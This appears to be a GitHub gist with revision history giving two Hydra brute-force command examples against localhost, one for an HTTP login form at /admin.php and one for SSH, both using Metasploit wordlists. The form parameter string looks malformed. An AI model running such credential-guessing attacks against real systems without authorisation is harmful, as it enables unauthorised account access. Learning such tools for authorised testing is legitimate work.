Skip to content

Instantly share code, notes, and snippets.

@redknight99
Last active September 12, 2019 05:27
Show Gist options
  • Select an option

  • Save redknight99/0b8a57f38b5d9a445a561b637271e173 to your computer and use it in GitHub Desktop.

Select an option

Save redknight99/0b8a57f38b5d9a445a561b637271e173 to your computer and use it in GitHub Desktop.

Revisions

  1. redknight99 revised this gist Sep 12, 2019. 1 changed file with 5 additions and 2 deletions.
    7 changes: 5 additions & 2 deletions SimpleHydraExamples.md
    Original file line number Diff line number Diff line change
    @@ -1,2 +1,5 @@
    # Simple Post Request Example
    ```hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"```
    # Simple Post Brute Force Example
    ```hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"```

    # Simple SSH Brute Force Example
    ```hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh```
  2. redknight99 revised this gist Sep 12, 2019. No changes.
  3. redknight99 revised this gist Sep 12, 2019. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion SimpleHydraExamples.md
    Original file line number Diff line number Diff line change
    @@ -1,2 +1,2 @@
    # Simple Post Request Example
    '''hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"'''
    ```hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"```
  4. redknight99 revised this gist Sep 12, 2019. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion SimpleHydraExamples.md
    Original file line number Diff line number Diff line change
    @@ -1,2 +1,2 @@
    # Simple Post Request Example
    hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"
    '''hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"'''
  5. redknight99 revised this gist Sep 12, 2019. No changes.
  6. redknight99 created this gist Sep 12, 2019.
    2 changes: 2 additions & 0 deletions SimpleHydraExamples.md
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,2 @@
    # Simple Post Request Example
    hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"